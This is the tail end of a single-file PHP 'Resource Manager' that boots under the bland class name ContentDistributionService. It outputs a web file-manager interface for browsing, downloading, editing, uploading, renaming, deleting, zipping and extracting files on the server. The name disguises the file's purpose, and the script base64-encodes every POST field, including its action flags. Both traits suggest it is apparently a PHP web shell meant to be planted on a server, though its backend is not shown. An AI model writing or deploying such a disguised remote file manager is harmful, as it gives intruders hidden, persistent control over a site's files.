            echo '<tr>';
            echo '<td><input type="checkbox" class="ck-item" name="sel[]" value="' . $en . '"></td>';
            echo '<td><div class="rn">' . $icon . ' ';

            if ($is_dir) {
                echo '<a href="?go=' . urlencode(str_replace($this->root_path, '', $path)) . '">' . $en . '</a>';
            } else {
                echo '<a href="?go=' . $er . '&dl=' . urlencode($name) . '">' . $en . '</a>';
            }

            echo '</div></td>';
            echo '<td class="meta">' . $ext . '</td>';
            echo '<td class="meta">' . $size . '</td>';
            echo '<td class="meta">' . $this->esc($mtime) . '</td>';
            echo '<td class="acts-col"><div class="btn-group">';

            if (!$is_dir) {
                echo '<button type="button" class="btn btn-outline-info" onclick="editFile(\'' . $en . '\')"><i class="bi bi-pencil"></i></button>';
                echo '<button type="button" class="btn btn-outline-secondary" onclick="previewFile(\'' . $en . '\')"><i class="bi bi-eye"></i></button>';
            } else {
                echo '<a href="?go=' . urlencode(str_replace($this->root_path, '', $path)) . '" class="btn btn-outline-secondary"><i class="bi bi-folder2-open"></i></a>';
            }

            echo '<a href="?go=' . $er . '&zip=' . urlencode($name) . '" class="btn btn-outline-secondary"><i class="bi bi-file-zip"></i></a>';
            echo '<button type="button" class="btn btn-outline-warning" onclick="renameFile(\'' . $en . '\')"><i class="bi bi-pencil-square"></i></button>';

            if (strtolower(pathinfo($name, PATHINFO_EXTENSION)) === 'zip') {
                echo '<button type="button" class="btn btn-outline-success" onclick="extractFile(\'' . $en . '\')"><i class="bi bi-box-arrow-up"></i></button>';
            }

            echo '<a href="?go=' . $er . '&rm=' . urlencode($name) . '" class="btn btn-outline-danger" onclick="return confirm(\'Remove ' . $en . '?\')"><i class="bi bi-trash"></i></a>';
            echo '</div></td></tr>';
        }

        echo '
</tbody></table></form>
</div></div>
<div class="pg-foot">Resource Manager v' . SVC_VER . '</div>
</div>';

        // ---- Modals ----
        echo '
<!-- Edit Modal -->
<div class="modal fade" id="editModal" tabindex="-1">
<div class="modal-dialog modal-lg"><div class="modal-content">
<div class="modal-header"><h5 class="modal-title">Edit: <span id="editTitle"></span></h5>
<button type="button" class="btn-close" data-bs-dismiss="modal"></button></div>
<div class="modal-body">
<textarea id="codeEditor" class="form-control" rows="22"></textarea>
<input type="hidden" id="editNameH">
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
<button type="button" id="saveBtn" class="btn btn-primary" onclick="doSave()"><i class="bi bi-save"></i> Save</button>
</div></div></div></div>

<!-- Rename Modal -->
<div class="modal fade" id="renameModal" tabindex="-1">
<div class="modal-dialog"><div class="modal-content">
<div class="modal-header"><h5 class="modal-title">Rename</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal"></button></div>
<div class="modal-body">
<input type="hidden" id="renameOld">
<input type="text" id="renameNew" class="form-control" placeholder="New name">
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="button" class="btn btn-primary" onclick="doRename()"><i class="bi bi-check-lg"></i> Rename</button>
</div></div></div></div>

<!-- Preview Modal -->
<div class="modal fade" id="previewModal" tabindex="-1">
<div class="modal-dialog modal-xl"><div class="modal-content">
<div class="modal-header"><h5 class="modal-title" id="previewTitle"></h5>
<button type="button" class="btn-close" data-bs-dismiss="modal"></button></div>
<div class="modal-body" id="previewBody" style="min-height:200px"></div>
<div class="modal-footer">
<a id="previewDl" class="btn btn-outline-secondary" href="#" download><i class="bi bi-download"></i> Download</a>
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
</div></div></div></div>
';

        // ---- Scripts ----
        echo '
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
<script>
var CSRF="' . $csrf . '";
var GO="' . urlencode($go) . '";

// Theme toggle
var html=document.documentElement,themeBtn=document.getElementById("themeBtn"),themeI=themeBtn.querySelector("i");
function setTheme(d){html.setAttribute("data-bs-theme",d?"dark":"light");themeI.className=d?"bi bi-sun-fill":"bi bi-moon-stars-fill";localStorage.setItem("rm_theme",d)}
themeBtn.addEventListener("click",function(){setTheme(html.getAttribute("data-bs-theme")!=="dark")});
if(localStorage.getItem("rm_theme")==="true"||(localStorage.getItem("rm_theme")===null&&window.matchMedia("(prefers-color-scheme:dark)").matches)){setTheme(true)}

function qs(s){return document.querySelector(s)}
function qsa(s){return Array.from(document.querySelectorAll(s))}
function enc(s){return btoa(unescape(encodeURIComponent(s)))}

function postJSON(data,cb){
fetch("",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(data)})
.then(function(r){return r.json()}).then(function(j){if(cb)cb(j);else location.reload()}).catch(function(){location.reload()})
}

// Checkboxes
var selAll=qs("#selAll"),btnDel=qs("#btnDel"),btnZip=qs("#btnZip");
function syncBtns(){var any=qsa(".ck-item").some(function(c){return c.checked});btnDel.disabled=!any;btnZip.disabled=!any}
selAll.addEventListener("change",function(){qsa(".ck-item").forEach(function(c){c.checked=selAll.checked});syncBtns()});
qsa(".ck-item").forEach(function(c){c.addEventListener("change",function(){if(!c.checked)selAll.checked=false;else if(qsa(".ck-item").every(function(x){return x.checked}))selAll.checked=true;syncBtns()})});

function doBatch(t){
var f=qs("#resForm");
var h=document.createElement("input");h.type="hidden";
if(t==="del"){if(!confirm("Delete selected?"))return;h.name="do_delete";h.value="1"}
else{h.name="do_archive";h.value="1"}
f.appendChild(h);f.submit();
}

function editFile(n){
fetch("?go="+GO+"&view="+encodeURIComponent(n)).then(function(r){return r.text()}).then(function(t){
qs("#editTitle").textContent=n;qs("#editNameH").value=n;qs("#codeEditor").value=t;
new bootstrap.Modal(qs("#editModal")).show()})
}

function doSave(){
var n=qs("#editNameH").value,c=qs("#codeEditor").value,btn=qs("#saveBtn");
btn.disabled=true;btn.innerHTML=\'<i class="bi bi-hourglass"></i> Saving...\';
postJSON({_csrf:CSRF,do_save:enc("1"),res_name:enc(n),res_body:enc(c)},function(){
btn.disabled=false;btn.innerHTML=\'<i class="bi bi-save"></i> Save\';
bootstrap.Modal.getInstance(qs("#editModal")).hide();location.reload()})
}

function renameFile(n){
qs("#renameOld").value=n;qs("#renameNew").value=n;
new bootstrap.Modal(qs("#renameModal")).show()
}
function doRename(){
var o=qs("#renameOld").value,n=qs("#renameNew").value;
if(!n)return;
postJSON({_csrf:CSRF,do_rename:enc("1"),old_name:enc(o),new_name:enc(n)})
}

function extractFile(n){
if(!confirm("Extract "+n+" here?"))return;
postJSON({_csrf:CSRF,do_extract:enc("1"),archive_name:enc(n)})
}

function createItem(e,t){
e.preventDefault();
var data={_csrf:CSRF};
if(t==="folder"){var v=qs("#newFolderName").value;if(!v)return false;data.new_folder=enc(v)}
else{var v=qs("#newFileName").value;if(!v)return false;data.new_file=enc(v)}
postJSON(data);return false;
}

function previewFile(n){
var body=qs("#previewBody"),title=qs("#previewTitle"),dl=qs("#previewDl");
body.innerHTML=\'<div class="text-center">Loading...</div>\';
title.textContent=n;
dl.href="?go="+GO+"&dl="+encodeURIComponent(n);
var ext=n.split(".").pop().toLowerCase();
var imgExts=["png","jpg","jpeg","gif","webp","bmp","svg","ico"];
var audExts=["mp3","wav","ogg","flac"];
var vidExts=["mp4","webm","mov"];
if(imgExts.indexOf(ext)>=0){
body.innerHTML=\'<img style="max-width:100%;height:auto;border-radius:8px" src="?go=\'+GO+\'&dl=\'+encodeURIComponent(n)+\'">\';
}else if(audExts.indexOf(ext)>=0){
body.innerHTML=\'<audio controls src="?go=\'+GO+\'&dl=\'+encodeURIComponent(n)+\'" style="width:100%"></audio>\';
}else if(vidExts.indexOf(ext)>=0){
body.innerHTML=\'<video controls style="max-width:100%;border-radius:8px" src="?go=\'+GO+\'&dl=\'+encodeURIComponent(n)+\'"></video>\';
}else if(ext==="pdf"){
body.innerHTML=\'<iframe src="?go=\'+GO+\'&dl=\'+encodeURIComponent(n)+\'" style="width:100%;height:80vh;border:none;border-radius:8px"></iframe>\';
}else{
fetch("?go="+GO+"&view="+encodeURIComponent(n)).then(function(r){return r.text()}).then(function(t){
var chunk=t.length>20000?t.slice(0,20000)+"\\n\\n...truncated...":t;
body.innerHTML=\'<pre style="white-space:pre-wrap;word-break:break-word;font-family:monospace;font-size:13px;padding:12px;background:var(--bg);border-radius:8px">\'+escHtml(chunk)+\'</pre>\'
}).catch(function(){body.innerHTML=\'<div class="text-danger">Cannot preview.</div>\'})
}
new bootstrap.Modal(qs("#previewModal")).show()
}
function escHtml(s){return s.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}

// Upload engine
var prog=qs("#progBar"),fill=qs("#progFill");
function readAsB64(file){return new Promise(function(res){var r=new FileReader();r.onload=function(){res({name:file.name,data:r.result})};r.readAsDataURL(file)})}
function uploadFiles(files){
if(!files||files.length===0)return;
prog.style.display="block";fill.style.width="10%";
var p=[];
for(var i=0;i<files.length;i++)p.push(readAsB64(files[i]));
Promise.all(p).then(function(results){
fill.style.width="50%";
var payload={_csrf:CSRF,do_ajax_upload:enc("1"),files_payload:JSON.stringify(results)};
fetch("",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(payload)})
.then(function(r){return r.json()}).then(function(){prog.style.display="none";fill.style.width="0%";location.reload()})
.catch(function(){prog.style.display="none";location.reload()})
})}
qs("#uploadBtn").addEventListener("click",function(){uploadFiles(qs("#fileInput").files)});
var dz=qs("#dropZone"),_dc=0;
dz.addEventListener("dragenter",function(ev){ev.preventDefault();_dc++;dz.classList.add("over")});
dz.addEventListener("dragover",function(ev){ev.preventDefault()});
dz.addEventListener("dragleave",function(){_dc--;if(_dc<=0){_dc=0;dz.classList.remove("over")}});
dz.addEventListener("drop",function(ev){ev.preventDefault();ev.stopPropagation();_dc=0;dz.classList.remove("over");uploadFiles(ev.dataTransfer.files)});

// Search hotkey
document.addEventListener("keydown",function(e){if((e.ctrlKey||e.metaKey)&&e.key==="k"){e.preventDefault();var s=qs("input[name=search]");if(s)s.focus()}});
</script>
</body>
</html>';
    }
}

// Boot
$_svc = new ContentDistributionService();
$_svc->handle();
